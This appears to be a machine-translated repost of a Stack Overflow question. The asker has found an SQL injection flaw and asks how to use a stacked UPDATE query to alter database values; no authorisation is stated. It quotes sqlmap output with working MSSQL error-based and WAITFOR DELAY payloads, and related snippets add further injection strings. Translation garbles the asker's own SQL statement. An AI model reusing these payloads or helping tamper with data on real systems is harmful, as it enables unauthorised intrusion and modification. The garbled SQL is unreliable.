查找漏洞时检测到SQLi。 因此,我使用UPDATE查询来更改数据库值,但是它不起作用。

我试图验证数据库中是否存在触发器,但是不存在触发器。

更新DATABASE.DBO.TABLE SET ID ='AFTER',而ID ='BEFORE'之后-不起作用。

---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload:page=' AND 2889 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (2889=2889) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(98)+CHAR(113)))-- LRXC

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload:page=';WAITFOR DELAY '0:0:5'--
---

有人可以告诉我如何吗?

  ask by 34 requirement translate from so

本文未有回复,本站智能推荐:

1回复

(sql 注入)sqli-lab 15:where 子句中无法理解的行为

我正在学习sql注入,我在我的电脑上设置了sqli-lab环境(windows+php+mysql 5.5.53)。 我在解决sqli-lab 15的时候遇到了两个问题,这个问题的源码如下: 当我将发布数据uname=1' or sleep(3)%23&password=2提交到
2回复

如果注入的查询正确,则可能会重定向到网页的 SQL 注入

在我朋友的授权下,我正在测试他的网站是否存在潜在漏洞。 我试图找出是否能够将 SQL 查询注入 POST 请求参数hi' or 1=1 -- : 我发现文档打印出来了: 而' or 0=0 --我得到: 这是否意味着它容易受到 SQL 注入的攻击? 如果是,我怎样才能让它打印服务器系统
1回复

sqlmap通过肥皂体内的参数注入?

香皂像吹一样: 如何使用sqlmap通过名称或年龄等参数注入? 如果没有,我可以使用HttpRequest(Java)或类似的方法来执行sqlmap吗?
2回复

在sqlmap中打印注入参数的值

我使用sqlmap进行注入,URL看起来像python sqlmap.py -u“ http:// localhost / utility /?site_name = 30 ”,所以我只想知道sqlmap尝试为注入的site_name提供输入的值是什么。
4回复

SQLMAP来测试sql注入

我运行SQLMAP来测试其中一个站点的SQL注入,并获得以下信息。 我不确定,这个网站在多大程度上容易受到这么多信息的影响?
1回复

Sqlmap参数“可能无法注入”

我以sqlmap开头,我有以下疑问:当我尝试使用此代码段使用sqlmap(试图绕过waf)时: 或这一个: 我看到控制台中出现: [警告]启发式(基本)测试表明GET参数“选项”可能不可注入[警告]启发式(基本)测试表明GET参数“视图”可能不可注入 还尝试在我的网站
1回复

在sqlmap中结合基于布尔和时间相关的SQL注入

我遇到了一个基于布尔的Blind SQL注入漏洞,但是从服务器获得的响应是​​基于时间的。 换句话说,如果条件为“假”,则网站将返回“错误”语句。.如果条件为“真”,则不会加载该页面。 例如 http://testingzone.com/id=123+OR+1=2 返回
1回复

如何使用xampp设置sqlmap注入?

现在,我使用xampp来模拟服务器,但我不知道如何发布代码,stackoverflow不允许我这样做。 因此,我下载了Python ver2.7和sqlmap来尝试注入我的网站(.php)。 然后我在Internet上搜索教程,并使用“ sqlmap.py -u“ link”命令获取